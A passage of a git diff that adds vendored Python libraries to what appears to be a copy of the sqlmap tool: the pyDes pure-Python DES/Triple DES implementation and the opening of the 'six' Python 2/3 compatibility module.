C (for performance reasons). +# +# Triple DES class is also implemented, utilising the DES base. Triple DES +# is either DES-EDE3 with a 24 byte key, or DES-EDE2 with a 16 byte key. +# +# See the README.txt that should come with this python module for the +# implementation methods used. +# +# Thanks to: +# * David Broadwell for ideas, comments and suggestions. +# * Mario Wolff for pointing out and debugging some triple des CBC errors. +# * Santiago Palladino for providing the PKCS5 padding technique. +# * Shaya for correcting the PAD_PKCS5 triple des CBC errors. +# +"""A pure python implementation of the DES and TRIPLE DES encryption algorithms. + +Class initialization +-------------------- +pyDes.des(key, [mode], [IV], [pad], [padmode]) +pyDes.triple_des(key, [mode], [IV], [pad], [padmode]) + +key -> Bytes containing the encryption key. 8 bytes for DES, 16 or 24 bytes + for Triple DES +mode -> Optional argument for encryption type, can be either + pyDes.ECB (Electronic Code Book) or pyDes.CBC (Cypher Block Chaining) +IV -> Optional Initial Value bytes, must be supplied if using CBC mode. + Length must be 8 bytes. +pad -> Optional argument, set the pad character (PAD_NORMAL) to use during + all encrypt/decrpt operations done with this instance. +padmode -> Optional argument, set the padding mode (PAD_NORMAL or PAD_PKCS5) + to use during all encrypt/decrpt operations done with this instance. + +I recommend to use PAD_PKCS5 padding, as then you never need to worry about any +padding issues, as the padding can be removed unambiguously upon decrypting +data that was encrypted using PAD_PKCS5 padmode. + +Common methods +-------------- +encrypt(data, [pad], [padmode]) +decrypt(data, [pad], [padmode]) + +data -> Bytes to be encrypted/decrypted +pad -> Optional argument. Only when using padmode of PAD_NORMAL. For + encryption, adds this characters to the end of the data block when + data is not a multiple of 8 bytes. For decryption, will remove the + trailing characters that match this pad character from the last 8 + bytes of the unencrypted data block. +padmode -> Optional argument, set the padding mode, must be one of PAD_NORMAL + or PAD_PKCS5). Defaults to PAD_NORMAL. + + +Example +------- +from pyDes import * + +data = "Please encrypt my data" +k = des("DESCRYPT", CBC, "\0\0\0\0\0\0\0\0", pad=None, padmode=PAD_PKCS5) +# For Python3, you'll need to use bytes, i.e.: +# data = b"Please encrypt my data" +# k = des(b"DESCRYPT", CBC, b"\0\0\0\0\0\0\0\0", pad=None, padmode=PAD_PKCS5) +d = k.encrypt(data) +print "Encrypted: %r" % d +print "Decrypted: %r" % k.decrypt(d) +assert k.decrypt(d, padmode=PAD_PKCS5) == data + + +See the module source (pyDes.py) for more examples of use. +You can also run the pyDes.py file without and arguments to see a simple test. + +Note: This code was not written for high-end systems needing a fast + implementation, but rather a handy portable solution with small usage. + +""" + +import sys + +# _pythonMajorVersion is used to handle Python2 and Python3 differences. +_pythonMajorVersion = sys.version_info[0] + +# Modes of crypting / cyphering +ECB = 0 +CBC = 1 + +# Modes of padding +PAD_NORMAL = 1 +PAD_PKCS5 = 2 + +# PAD_PKCS5: is a method that will unambiguously remove all padding +# characters after decryption, when originally encrypted with +# this padding mode. +# For a good description of the PKCS5 padding technique, see: +# http://www.faqs.org/rfcs/rfc1423.html + +# The base class shared by des and triple des. +class _baseDes(object): + def __init__(self, mode=ECB, IV=None, pad=None, padmode=PAD_NORMAL): + if IV: + IV = self._guardAgainstUnicode(IV) + if pad: + pad = self._guardAgainstUnicode(pad) + self.block_size = 8 + # Sanity checking of arguments. + if pad and padmode == PAD_PKCS5: + raise ValueError("Cannot use a pad character with PAD_PKCS5") + if IV and len(IV) != self.block_size: + raise ValueError("Invalid Initial Value (IV), must be a multiple of " + str(self.block_size) + " bytes") + + # Set the passed in variables + self._mode = mode + self._iv = IV + self._padding = pad + self._padmode = padmode + + def getKey(self): + """getKey() -> bytes""" + return self.__key + + def setKey(self, key): + """Will set the crypting key for this object.""" + key = self._guardAgainstUnicode(key) + self.__key = key + + def getMode(self): + """getMode() -> pyDes.ECB or pyDes.CBC""" + return self._mode + + def setMode(self, mode): + """Sets the type of crypting mode, pyDes.ECB or pyDes.CBC""" + self._mode = mode + + def getPadding(self): + """getPadding() -> bytes of length 1. Padding character.""" + return self._padding + + def setPadding(self, pad): + """setPadding() -> bytes of length 1. Padding character.""" + if pad is not None: + pad = self._guardAgainstUnicode(pad) + self._padding = pad + + def getPadMode(self): + """getPadMode() -> pyDes.PAD_NORMAL or pyDes.PAD_PKCS5""" + return self._padmode + + def setPadMode(self, mode): + """Sets the type of padding mode, pyDes.PAD_NORMAL or pyDes.PAD_PKCS5""" + self._padmode = mode + + def getIV(self): + """getIV() -> bytes""" + return self._iv + + def setIV(self, IV): + """Will set the Initial Value, used in conjunction with CBC mode""" + if not IV or len(IV) != self.block_size: + raise ValueError("Invalid Initial Value (IV), must be a multiple of " + str(self.block_size) + " bytes") + IV = self._guardAgainstUnicode(IV) + self._iv = IV + + def _padData(self, data, pad, padmode): + # Pad data depending on the mode + if padmode is None: + # Get the default padding mode. + padmode = self.getPadMode() + if pad and padmode == PAD_PKCS5: + raise ValueError("Cannot use a pad character with PAD_PKCS5") + + if padmode == PAD_NORMAL: + if len(data) % self.block_size == 0: + # No padding required. + return data + + if not pad: + # Get the default padding. + pad = self.getPadding() + if not pad: + raise ValueError("Data must be a multiple of " + str(self.block_size) + " bytes in length. Use padmode=PAD_PKCS5 or set the pad character.") + data += (self.block_size - (len(data) % self.block_size)) * pad + + elif padmode == PAD_PKCS5: + pad_len = 8 - (len(data) % self.block_size) + if _pythonMajorVersion < 3: + data += pad_len * chr(pad_len) + else: + data += bytes([pad_len] * pad_len) + + return data + + def _unpadData(self, data, pad, padmode): + # Unpad data depending on the mode. + if not data: + return data + if pad and padmode == PAD_PKCS5: + raise ValueError("Cannot use a pad character with PAD_PKCS5") + if padmode is None: + # Get the default padding mode. + padmode = self.getPadMode() + + if padmode == PAD_NORMAL: + if not pad: + # Get the default padding. + pad = self.getPadding() + if pad: + data = data[:-self.block_size] + \ + data[-self.block_size:].rstrip(pad) + + elif padmode == PAD_PKCS5: + if _pythonMajorVersion < 3: + pad_len = ord(data[-1]) + else: + pad_len = data[-1] + data = data[:-pad_len] + + return data + + def _guardAgainstUnicode(self, data): + # Only accept byte strings or ascii unicode values, otherwise + # there is no way to correctly decode the data into bytes. + if _pythonMajorVersion < 3: + if isinstance(data, unicode): + raise ValueError("pyDes can only work with bytes, not Unicode strings.") + else: + if isinstance(data, str): + # Only accept ascii unicode values. + try: + return data.encode('ascii') + except UnicodeEncodeError: + pass + raise ValueError("pyDes can only work with encoded strings, not Unicode.") + return data + +############################################################################# +# DES # +############################################################################# +class des(_baseDes): + """DES encryption/decrytpion class + + Supports ECB (Electronic Code Book) and CBC (Cypher Block Chaining) modes. + + pyDes.des(key,[mode], [IV]) + + key -> Bytes containing the encryption key, must be exactly 8 bytes + mode -> Optional argument for encryption type, can be either pyDes.ECB + (Electronic Code Book), pyDes.CBC (Cypher Block Chaining) + IV -> Optional Initial Value bytes, must be supplied if using CBC mode. + Must be 8 bytes in length. + pad -> Optional argument, set the pad character (PAD_NORMAL) to use + during all encrypt/decrpt operations done with this instance. + padmode -> Optional argument, set the padding mode (PAD_NORMAL or + PAD_PKCS5) to use during all encrypt/decrpt operations done + with this instance. + """ + + + # Permutation and translation tables for DES + __pc1 = [56, 48, 40, 32, 24, 16, 8, + 0, 57, 49, 41, 33, 25, 17, + 9, 1, 58, 50, 42, 34, 26, + 18, 10, 2, 59, 51, 43, 35, + 62, 54, 46, 38, 30, 22, 14, + 6, 61, 53, 45, 37, 29, 21, + 13, 5, 60, 52, 44, 36, 28, + 20, 12, 4, 27, 19, 11, 3 + ] + + # number left rotations of pc1 + __left_rotations = [ + 1, 1, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 1 + ] + + # permuted choice key (table 2) + __pc2 = [ + 13, 16, 10, 23, 0, 4, + 2, 27, 14, 5, 20, 9, + 22, 18, 11, 3, 25, 7, + 15, 6, 26, 19, 12, 1, + 40, 51, 30, 36, 46, 54, + 29, 39, 50, 44, 32, 47, + 43, 48, 38, 55, 33, 52, + 45, 41, 49, 35, 28, 31 + ] + + # initial permutation IP + __ip = [57, 49, 41, 33, 25, 17, 9, 1, + 59, 51, 43, 35, 27, 19, 11, 3, + 61, 53, 45, 37, 29, 21, 13, 5, + 63, 55, 47, 39, 31, 23, 15, 7, + 56, 48, 40, 32, 24, 16, 8, 0, + 58, 50, 42, 34, 26, 18, 10, 2, + 60, 52, 44, 36, 28, 20, 12, 4, + 62, 54, 46, 38, 30, 22, 14, 6 + ] + + # Expansion table for turning 32 bit blocks into 48 bits + __expansion_table = [ + 31, 0, 1, 2, 3, 4, + 3, 4, 5, 6, 7, 8, + 7, 8, 9, 10, 11, 12, + 11, 12, 13, 14, 15, 16, + 15, 16, 17, 18, 19, 20, + 19, 20, 21, 22, 23, 24, + 23, 24, 25, 26, 27, 28, + 27, 28, 29, 30, 31, 0 + ] + + # The (in)famous S-boxes + __sbox = [ + # S1 + [14, 4, 13, 1, 2, 15, 11, 8, 3, 10, 6, 12, 5, 9, 0, 7, + 0, 15, 7, 4, 14, 2, 13, 1, 10, 6, 12, 11, 9, 5, 3, 8, + 4, 1, 14, 8, 13, 6, 2, 11, 15, 12, 9, 7, 3, 10, 5, 0, + 15, 12, 8, 2, 4, 9, 1, 7, 5, 11, 3, 14, 10, 0, 6, 13], + + # S2 + [15, 1, 8, 14, 6, 11, 3, 4, 9, 7, 2, 13, 12, 0, 5, 10, + 3, 13, 4, 7, 15, 2, 8, 14, 12, 0, 1, 10, 6, 9, 11, 5, + 0, 14, 7, 11, 10, 4, 13, 1, 5, 8, 12, 6, 9, 3, 2, 15, + 13, 8, 10, 1, 3, 15, 4, 2, 11, 6, 7, 12, 0, 5, 14, 9], + + # S3 + [10, 0, 9, 14, 6, 3, 15, 5, 1, 13, 12, 7, 11, 4, 2, 8, + 13, 7, 0, 9, 3, 4, 6, 10, 2, 8, 5, 14, 12, 11, 15, 1, + 13, 6, 4, 9, 8, 15, 3, 0, 11, 1, 2, 12, 5, 10, 14, 7, + 1, 10, 13, 0, 6, 9, 8, 7, 4, 15, 14, 3, 11, 5, 2, 12], + + # S4 + [7, 13, 14, 3, 0, 6, 9, 10, 1, 2, 8, 5, 11, 12, 4, 15, + 13, 8, 11, 5, 6, 15, 0, 3, 4, 7, 2, 12, 1, 10, 14, 9, + 10, 6, 9, 0, 12, 11, 7, 13, 15, 1, 3, 14, 5, 2, 8, 4, + 3, 15, 0, 6, 10, 1, 13, 8, 9, 4, 5, 11, 12, 7, 2, 14], + + # S5 + [2, 12, 4, 1, 7, 10, 11, 6, 8, 5, 3, 15, 13, 0, 14, 9, + 14, 11, 2, 12, 4, 7, 13, 1, 5, 0, 15, 10, 3, 9, 8, 6, + 4, 2, 1, 11, 10, 13, 7, 8, 15, 9, 12, 5, 6, 3, 0, 14, + 11, 8, 12, 7, 1, 14, 2, 13, 6, 15, 0, 9, 10, 4, 5, 3], + + # S6 + [12, 1, 10, 15, 9, 2, 6, 8, 0, 13, 3, 4, 14, 7, 5, 11, + 10, 15, 4, 2, 7, 12, 9, 5, 6, 1, 13, 14, 0, 11, 3, 8, + 9, 14, 15, 5, 2, 8, 12, 3, 7, 0, 4, 10, 1, 13, 11, 6, + 4, 3, 2, 12, 9, 5, 15, 10, 11, 14, 1, 7, 6, 0, 8, 13], + + # S7 + [4, 11, 2, 14, 15, 0, 8, 13, 3, 12, 9, 7, 5, 10, 6, 1, + 13, 0, 11, 7, 4, 9, 1, 10, 14, 3, 5, 12, 2, 15, 8, 6, + 1, 4, 11, 13, 12, 3, 7, 14, 10, 15, 6, 8, 0, 5, 9, 2, + 6, 11, 13, 8, 1, 4, 10, 7, 9, 5, 0, 15, 14, 2, 3, 12], + + # S8 + [13, 2, 8, 4, 6, 15, 11, 1, 10, 9, 3, 14, 5, 0, 12, 7, + 1, 15, 13, 8, 10, 3, 7, 4, 12, 5, 6, 11, 0, 14, 9, 2, + 7, 11, 4, 1, 9, 12, 14, 2, 0, 6, 10, 13, 15, 3, 5, 8, + 2, 1, 14, 7, 4, 10, 8, 13, 15, 12, 9, 0, 3, 5, 6, 11], + ] + + + # 32-bit permutation function P used on the output of the S-boxes + __p = [ + 15, 6, 19, 20, 28, 11, + 27, 16, 0, 14, 22, 25, + 4, 17, 30, 9, 1, 7, + 23,13, 31, 26, 2, 8, + 18, 12, 29, 5, 21, 10, + 3, 24 + ] + + # final permutation IP^-1 + __fp = [ + 39, 7, 47, 15, 55, 23, 63, 31, + 38, 6, 46, 14, 54, 22, 62, 30, + 37, 5, 45, 13, 53, 21, 61, 29, + 36, 4, 44, 12, 52, 20, 60, 28, + 35, 3, 43, 11, 51, 19, 59, 27, + 34, 2, 42, 10, 50, 18, 58, 26, + 33, 1, 41, 9, 49, 17, 57, 25, + 32, 0, 40, 8, 48, 16, 56, 24 + ] + + # Type of crypting being done + ENCRYPT = 0x00 + DECRYPT = 0x01 + + # Initialisation + def __init__(self, key, mode=ECB, IV=None, pad=None, padmode=PAD_NORMAL): + # Sanity checking of arguments. + if len(key) != 8: + raise ValueError("Invalid DES key size. Key must be exactly 8 bytes long.") + _baseDes.__init__(self, mode, IV, pad, padmode) + self.key_size = 8 + + self.L = [] + self.R = [] + self.Kn = [ [0] * 48 ] * 16 # 16 48-bit keys (K1 - K16) + self.final = [] + + self.setKey(key) + + def setKey(self, key): + """Will set the crypting key for this object. Must be 8 bytes.""" + _baseDes.setKey(self, key) + self.__create_sub_keys() + + def __String_to_BitList(self, data): + """Turn the string data, into a list of bits (1, 0)'s""" + if _pythonMajorVersion < 3: + # Turn the strings into integers. Python 3 uses a bytes + # class, which already has this behaviour. + data = [ord(c) for c in data] + l = len(data) * 8 + result = [0] * l + pos = 0 + for ch in data: + i = 7 + while i >= 0: + if ch & (1 << i) != 0: + result[pos] = 1 + else: + result[pos] = 0 + pos += 1 + i -= 1 + + return result + + def __BitList_to_String(self, data): + """Turn the list of bits -> data, into a string""" + result = [] + pos = 0 + c = 0 + while pos < len(data): + c += data[pos] << (7 - (pos % 8)) + if (pos % 8) == 7: + result.append(c) + c = 0 + pos += 1 + + if _pythonMajorVersion < 3: + return ''.join([ chr(c) for c in result ]) + else: + return bytes(result) + + def __permutate(self, table, block): + """Permutate this block with the specified table""" + return list(map(lambda x: block[x], table)) + + # Transform the secret key, so that it is ready for data processing + # Create the 16 subkeys, K[1] - K[16] + def __create_sub_keys(self): + """Create the 16 subkeys K[1] to K[16] from the given key""" + key = self.__permutate(des.__pc1, self.__String_to_BitList(self.getKey())) + i = 0 + # Split into Left and Right sections + self.L = key[:28] + self.R = key[28:] + while i < 16: + j = 0 + # Perform circular left shifts + while j < des.__left_rotations[i]: + self.L.append(self.L[0]) + del self.L[0] + + self.R.append(self.R[0]) + del self.R[0] + + j += 1 + + # Create one of the 16 subkeys through pc2 permutation + self.Kn[i] = self.__permutate(des.__pc2, self.L + self.R) + + i += 1 + + # Main part of the encryption algorithm, the number cruncher :) + def __des_crypt(self, block, crypt_type): + """Crypt the block of data through DES bit-manipulation""" + block = self.__permutate(des.__ip, block) + self.L = block[:32] + self.R = block[32:] + + # Encryption starts from Kn[1] through to Kn[16] + if crypt_type == des.ENCRYPT: + iteration = 0 + iteration_adjustment = 1 + # Decryption starts from Kn[16] down to Kn[1] + else: + iteration = 15 + iteration_adjustment = -1 + + i = 0 + while i < 16: + # Make a copy of R[i-1], this will later become L[i] + tempR = self.R[:] + + # Permutate R[i - 1] to start creating R[i] + self.R = self.__permutate(des.__expansion_table, self.R) + + # Exclusive or R[i - 1] with K[i], create B[1] to B[8] whilst here + self.R = list(map(lambda x, y: x ^ y, self.R, self.Kn[iteration])) + B = [self.R[:6], self.R[6:12], self.R[12:18], self.R[18:24], self.R[24:30], self.R[30:36], self.R[36:42], self.R[42:]] + # Optimization: Replaced below commented code with above + #j = 0 + #B = [] + #while j < len(self.R): + # self.R[j] = self.R[j] ^ self.Kn[iteration][j] + # j += 1 + # if j % 6 == 0: + # B.append(self.R[j-6:j]) + + # Permutate B[1] to B[8] using the S-Boxes + j = 0 + Bn = [0] * 32 + pos = 0 + while j < 8: + # Work out the offsets + m = (B[j][0] << 1) + B[j][5] + n = (B[j][1] << 3) + (B[j][2] << 2) + (B[j][3] << 1) + B[j][4] + + # Find the permutation value + v = des.__sbox[j][(m << 4) + n] + + # Turn value into bits, add it to result: Bn + Bn[pos] = (v & 8) >> 3 + Bn[pos + 1] = (v & 4) >> 2 + Bn[pos + 2] = (v & 2) >> 1 + Bn[pos + 3] = v & 1 + + pos += 4 + j += 1 + + # Permutate the concatination of B[1] to B[8] (Bn) + self.R = self.__permutate(des.__p, Bn) + + # Xor with L[i - 1] + self.R = list(map(lambda x, y: x ^ y, self.R, self.L)) + # Optimization: This now replaces the below commented code + #j = 0 + #while j < len(self.R): + # self.R[j] = self.R[j] ^ self.L[j] + # j += 1 + + # L[i] becomes R[i - 1] + self.L = tempR + + i += 1 + iteration += iteration_adjustment + + # Final permutation of R[16]L[16] + self.final = self.__permutate(des.__fp, self.R + self.L) + return self.final + + + # Data to be encrypted/decrypted + def crypt(self, data, crypt_type): + """Crypt the data in blocks, running it through des_crypt()""" + + # Error check the data + if not data: + return '' + if len(data) % self.block_size != 0: + if crypt_type == des.DECRYPT: # Decryption must work on 8 byte blocks + raise ValueError("Invalid data length, data must be a multiple of " + str(self.block_size) + " bytes\n.") + if not self.getPadding(): + raise ValueError("Invalid data length, data must be a multiple of " + str(self.block_size) + " bytes\n. Try setting the optional padding character") + else: + data += (self.block_size - (len(data) % self.block_size)) * self.getPadding() + # print "Len of data: %f" % (len(data) / self.block_size) + + if self.getMode() == CBC: + if self.getIV(): + iv = self.__String_to_BitList(self.getIV()) + else: + raise ValueError("For CBC mode, you must supply the Initial Value (IV) for ciphering") + + # Split the data into blocks, crypting each one seperately + i = 0 + dict = {} + result = [] + #cached = 0 + #lines = 0 + while i < len(data): + # Test code for caching encryption results + #lines += 1 + #if dict.has_key(data[i:i+8]): + #print "Cached result for: %s" % data[i:i+8] + # cached += 1 + # result.append(dict[data[i:i+8]]) + # i += 8 + # continue + + block = self.__String_to_BitList(data[i:i+8]) + + # Xor with IV if using CBC mode + if self.getMode() == CBC: + if crypt_type == des.ENCRYPT: + block = list(map(lambda x, y: x ^ y, block, iv)) + #j = 0 + #while j < len(block): + # block[j] = block[j] ^ iv[j] + # j += 1 + + processed_block = self.__des_crypt(block, crypt_type) + + if crypt_type == des.DECRYPT: + processed_block = list(map(lambda x, y: x ^ y, processed_block, iv)) + #j = 0 + #while j < len(processed_block): + # processed_block[j] = processed_block[j] ^ iv[j] + # j += 1 + iv = block + else: + iv = processed_block + else: + processed_block = self.__des_crypt(block, crypt_type) + + + # Add the resulting crypted block to our list + #d = self.__BitList_to_String(processed_block) + #result.append(d) + result.append(self.__BitList_to_String(processed_block)) + #dict[data[i:i+8]] = d + i += 8 + + # print "Lines: %d, cached: %d" % (lines, cached) + + # Return the full crypted string + if _pythonMajorVersion < 3: + return ''.join(result) + else: + return bytes.fromhex('').join(result) + + def encrypt(self, data, pad=None, padmode=None): + """encrypt(data, [pad], [padmode]) -> bytes + + data : Bytes to be encrypted + pad : Optional argument for encryption padding. Must only be one byte + padmode : Optional argument for overriding the padding mode. + + The data must be a multiple of 8 bytes and will be encrypted + with the already specified key. Data does not have to be a + multiple of 8 bytes if the padding character is supplied, or + the padmode is set to PAD_PKCS5, as bytes will then added to + ensure the be padded data is a multiple of 8 bytes. + """ + data = self._guardAgainstUnicode(data) + if pad is not None: + pad = self._guardAgainstUnicode(pad) + data = self._padData(data, pad, padmode) + return self.crypt(data, des.ENCRYPT) + + def decrypt(self, data, pad=None, padmode=None): + """decrypt(data, [pad], [padmode]) -> bytes + + data : Bytes to be encrypted + pad : Optional argument for decryption padding. Must only be one byte + padmode : Optional argument for overriding the padding mode. + + The data must be a multiple of 8 bytes and will be decrypted + with the already specified key. In PAD_NORMAL mode, if the + optional padding character is supplied, then the un-encrypted + data will have the padding characters removed from the end of + the bytes. This pad removal only occurs on the last 8 bytes of + the data (last data block). In PAD_PKCS5 mode, the special + padding end markers will be removed from the data after decrypting. + """ + data = self._guardAgainstUnicode(data) + if pad is not None: + pad = self._guardAgainstUnicode(pad) + data = self.crypt(data, des.DECRYPT) + return self._unpadData(data, pad, padmode) + + + +############################################################################# +# Triple DES # +############################################################################# +class triple_des(_baseDes): + """Triple DES encryption/decrytpion class + + This algorithm uses the DES-EDE3 (when a 24 byte key is supplied) or + the DES-EDE2 (when a 16 byte key is supplied) encryption methods. + Supports ECB (Electronic Code Book) and CBC (Cypher Block Chaining) modes. + + pyDes.des(key, [mode], [IV]) + + key -> Bytes containing the encryption key, must be either 16 or + 24 bytes long + mode -> Optional argument for encryption type, can be either pyDes.ECB + (Electronic Code Book), pyDes.CBC (Cypher Block Chaining) + IV -> Optional Initial Value bytes, must be supplied if using CBC mode. + Must be 8 bytes in length. + pad -> Optional argument, set the pad character (PAD_NORMAL) to use + during all encrypt/decrpt operations done with this instance. + padmode -> Optional argument, set the padding mode (PAD_NORMAL or + PAD_PKCS5) to use during all encrypt/decrpt operations done + with this instance. + """ + def __init__(self, key, mode=ECB, IV=None, pad=None, padmode=PAD_NORMAL): + _baseDes.__init__(self, mode, IV, pad, padmode) + self.setKey(key) + + def setKey(self, key): + """Will set the crypting key for this object. Either 16 or 24 bytes long.""" + self.key_size = 24 # Use DES-EDE3 mode + if len(key) != self.key_size: + if len(key) == 16: # Use DES-EDE2 mode + self.key_size = 16 + else: + raise ValueError("Invalid triple DES key size. Key must be either 16 or 24 bytes long") + if self.getMode() == CBC: + if not self.getIV(): + # Use the first 8 bytes of the key + self._iv = key[:self.block_size] + if len(self.getIV()) != self.block_size: + raise ValueError("Invalid IV, must be 8 bytes in length") + self.__key1 = des(key[:8], self._mode, self._iv, + self._padding, self._padmode) + self.__key2 = des(key[8:16], self._mode, self._iv, + self._padding, self._padmode) + if self.key_size == 16: + self.__key3 = self.__key1 + else: + self.__key3 = des(key[16:], self._mode, self._iv, + self._padding, self._padmode) + _baseDes.setKey(self, key) + + # Override setter methods to work on all 3 keys. + + def setMode(self, mode): + """Sets the type of crypting mode, pyDes.ECB or pyDes.CBC""" + _baseDes.setMode(self, mode) + for key in (self.__key1, self.__key2, self.__key3): + key.setMode(mode) + + def setPadding(self, pad): + """setPadding() -> bytes of length 1. Padding character.""" + _baseDes.setPadding(self, pad) + for key in (self.__key1, self.__key2, self.__key3): + key.setPadding(pad) + + def setPadMode(self, mode): + """Sets the type of padding mode, pyDes.PAD_NORMAL or pyDes.PAD_PKCS5""" + _baseDes.setPadMode(self, mode) + for key in (self.__key1, self.__key2, self.__key3): + key.setPadMode(mode) + + def setIV(self, IV): + """Will set the Initial Value, used in conjunction with CBC mode""" + _baseDes.setIV(self, IV) + for key in (self.__key1, self.__key2, self.__key3): + key.setIV(IV) + + def encrypt(self, data, pad=None, padmode=None): + """encrypt(data, [pad], [padmode]) -> bytes + + data : bytes to be encrypted + pad : Optional argument for encryption padding. Must only be one byte + padmode : Optional argument for overriding the padding mode. + + The data must be a multiple of 8 bytes and will be encrypted + with the already specified key. Data does not have to be a + multiple of 8 bytes if the padding character is supplied, or + the padmode is set to PAD_PKCS5, as bytes will then added to + ensure the be padded data is a multiple of 8 bytes. + """ + ENCRYPT = des.ENCRYPT + DECRYPT = des.DECRYPT + data = self._guardAgainstUnicode(data) + if pad is not None: + pad = self._guardAgainstUnicode(pad) + # Pad the data accordingly. + data = self._padData(data, pad, padmode) + if self.getMode() == CBC: + self.__key1.setIV(self.getIV()) + self.__key2.setIV(self.getIV()) + self.__key3.setIV(self.getIV()) + i = 0 + result = [] + while i < len(data): + block = self.__key1.crypt(data[i:i+8], ENCRYPT) + block = self.__key2.crypt(block, DECRYPT) + block = self.__key3.crypt(block, ENCRYPT) + self.__key1.setIV(block) + self.__key2.setIV(block) + self.__key3.setIV(block) + result.append(block) + i += 8 + if _pythonMajorVersion < 3: + return ''.join(result) + else: + return bytes.fromhex('').join(result) + else: + data = self.__key1.crypt(data, ENCRYPT) + data = self.__key2.crypt(data, DECRYPT) + return self.__key3.crypt(data, ENCRYPT) + + def decrypt(self, data, pad=None, padmode=None): + """decrypt(data, [pad], [padmode]) -> bytes + + data : bytes to be encrypted + pad : Optional argument for decryption padding. Must only be one byte + padmode : Optional argument for overriding the padding mode. + + The data must be a multiple of 8 bytes and will be decrypted + with the already specified key. In PAD_NORMAL mode, if the + optional padding character is supplied, then the un-encrypted + data will have the padding characters removed from the end of + the bytes. This pad removal only occurs on the last 8 bytes of + the data (last data block). In PAD_PKCS5 mode, the special + padding end markers will be removed from the data after + decrypting, no pad character is required for PAD_PKCS5. + """ + ENCRYPT = des.ENCRYPT + DECRYPT = des.DECRYPT + data = self._guardAgainstUnicode(data) + if pad is not None: + pad = self._guardAgainstUnicode(pad) + if self.getMode() == CBC: + self.__key1.setIV(self.getIV()) + self.__key2.setIV(self.getIV()) + self.__key3.setIV(self.getIV()) + i = 0 + result = [] + while i < len(data): + iv = data[i:i+8] + block = self.__key3.crypt(iv, DECRYPT) + block = self.__key2.crypt(block, ENCRYPT) + block = self.__key1.crypt(block, DECRYPT) + self.__key1.setIV(iv) + self.__key2.setIV(iv) + self.__key3.setIV(iv) + result.append(block) + i += 8 + if _pythonMajorVersion < 3: + data = ''.join(result) + else: + data = bytes.fromhex('').join(result) + else: + data = self.__key3.crypt(data, DECRYPT) + data = self.__key2.crypt(data, ENCRYPT) + data = self.__key1.crypt(data, DECRYPT) + return self._unpadData(data, pad, padmode) diff --git a/src/sqlmap-master/thirdparty/six/__init__.py b/src/sqlmap-master/thirdparty/six/__init__.py new file mode 100644 index 0000000..d4fe984 --- /dev/null +++ b/src/sqlmap-master/thirdparty/six/__init__.py @@ -0,0 +1,998 @@ +# Copyright (c) 2010-2020 Benjamin Peterson +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Utilities for writing code that runs on Python 2 and 3""" + +from __future__ import absolute_import + +import functools +import itertools +import operator +import sys +import types + +__author__ = "Benjamin Peterson " +__version__ = "1.16.0" + + +# Useful for very coarse version differentiation. +PY2 = sys.version_info[0] == 2 +PY3 = sys.version_info[0] == 3 +PY34 = sys.version_info[0:2] >= (3, 4) + +if PY3: + string_types = str, + integer_types = int, + class_types = type, + text_type = str + binary_type = bytes + + MAXSIZE = sys.maxsize +else: + string_types = basestring, + integer_types = (int, long) + class_types = (type, types.ClassType) + text_type = unicode + binary_type = str + + if sys.platform.startswith("java"): + # Jython always uses 32 bits. + MAXSIZE = int((1 << 31) - 1) + else: + # It's possible to have sizeof(long) != sizeof(Py_ssize_t). + class X(object): + + def __len__(self): + return 1 << 31 + try: + len(X()) + except OverflowError: + # 32-bit + MAXSIZE = int((1 << 31) - 1) + else: + # 64-bit + MAXSIZE = int((1 << 63) - 1) + del X + +if PY34: + from importlib.util import spec_from_loader +else: + spec_from_loader = None + + +def _add_doc(func, doc): + """Add documentation to a function.""" + func.__doc__ = doc + + +def _import_module(name): + """Import module, returning the module after the last dot.""" + __import__(name) + return sys.modules[name] + + +class _LazyDescr(object): + + def __init__(self, name): + self.name = name + + def __get__(self, obj, tp): + result = self._resolve() + setattr(obj, self.name, result) # Invokes __set__. + try: + # This is a bit ugly, but it avoids running this again by + # removing this descriptor. + delattr(obj.__class__, self.name) + except AttributeError: + pass + return result + + +class MovedModule(_LazyDescr): + + def __init__(self, name, old, new=None): + super(MovedModule, self).__init__(name) + if PY3: + if new is None: + new = name + self.mod = new + else: + self.mod = old + + def _resolve(self): + return _import_module(self.mod) + + def __getattr__(self, attr): + _module = self._resolve() + value = getattr(_module, attr) + setattr(self, attr, value) + return value + + +class _LazyModule(types.ModuleType): + + def __init__(self, name): + super(_LazyModule, self).__init__(name) + self.__doc__ = self.__class__.__doc__ + + def __dir__(self): + attrs = ["__doc__", "__name__"] + attrs += [attr.name for attr in self._moved_attributes] + return attrs + + # Subclasses should override this + _moved_attributes = [] + + +class MovedAttribute(_LazyDescr): + + def __init__(self, name, old_mod, new_mod, old_attr=None, new_attr=None): + super(MovedAttribute, self).__init__(name) + if PY3: + if new_mod is None: + new_mod = name + self.mod = new_mod + if new_attr is None: + if old_attr is None: + new_attr = name + else: + new_attr = old_attr + self.attr = new_attr + else: + self.mod = old_mod + if old_attr is None: + old_attr = name + self.attr = old_attr + + def _resolve(self): + module = _import_module(self.mod) + return getattr(module, self.attr) + + +class _SixMetaPathImporter(object): + + """ + A meta path importer to import six.moves and its submodules. + + This class implements a PEP302 finder and loader. It should be compatible + with Python 2.5 and all existing versions of Python3 + """ + + def __init__(self, six_module_name): + self.name = six_module_name + self.known_modules = {} + + def _add_module(self, mod, *fullnames): + for fullname in fullnames: + self.known_modules[self.name + "." + fullname] = mod + + def _get_module(self, fullname): + return self.known_modules[self.name + "." + fullname] + + def find_module(self, fullname, path=None): + if fullname in self.known_modules: + return self + return None + + def find_spec(self, fullname, path, 